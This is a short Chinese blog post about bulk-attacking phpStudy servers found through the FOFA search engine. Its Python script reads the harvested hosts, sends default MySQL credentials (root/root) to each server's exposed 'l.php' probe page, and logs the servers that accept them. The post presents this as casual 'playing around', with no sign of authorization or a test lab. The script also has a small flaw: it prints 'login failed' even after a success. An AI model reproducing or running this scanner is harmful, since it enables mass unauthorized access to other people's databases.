python + fofa 批量打phpstudy

通过fofa搜索: "phpStudy探针 2014"     使用fofa的api获取全部数据. 没什么技术含量, 就是玩玩, 页数靠后的数据基本上都关掉了, 所以也没几个可以利用的

def get_target():
	url_list = []
	with open("fofa_phpstudy_info.txt", "r") as f:
		target = json.loads(f.read())

	for strvar in target:
		for strvar2 in target[strvar]:
			url = "http://" + strvar2[1] + ":" + strvar2[2] + "/l.php#button"
			url_list.append(url)
	return url_list


url_list = get_target()

for php_url in url_list:
	header = {
		"Content-Type": "application/x-www-form-urlencoded"
	}
	data = {
		"host": "localhost",
		"port": "3306",
		"login": "root",
		"password": "root",
		"act": "MySQL检测"
	}
	try:
		res = requests.post(php_url, headers=header, data=data)

		if "连接到MySql数据库正常" in res.text:
			print(php_url, ":", "phpmyadmin登录成功, 账号root, 密码root")
			with open("phpstudy_ok.txt", "a") as f:
				f.write(php_url +  "|root|root\n")

		print(php_url, "phpmyadmin登录失败")
	except:
		print(php_url, "链接异常")

吧获取到的数据进行一个拼接. 这个测试是通过前端phpinfo页面进行测试的. 这里出现了mysql的测试接口. 

在通过抓包获取需要的数据, 在python中构造提交即可. 没什么难度, 就是随便玩一下.